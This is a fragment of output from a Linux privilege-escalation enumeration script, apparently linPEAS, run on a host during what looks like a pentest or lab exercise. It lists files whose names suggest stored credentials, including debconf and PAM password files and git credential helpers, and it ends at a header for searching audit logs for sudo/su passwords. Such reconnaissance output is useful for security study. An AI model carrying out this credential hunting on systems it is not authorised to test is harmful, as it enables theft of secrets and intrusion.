/usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/pam/password
/var/www/starting-page/blog/node_modules/caniuse-lite/data/features/credential-management.js
/var/www/starting-page/blog/node_modules/caniuse-lite/data/features/passwordrules.js
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs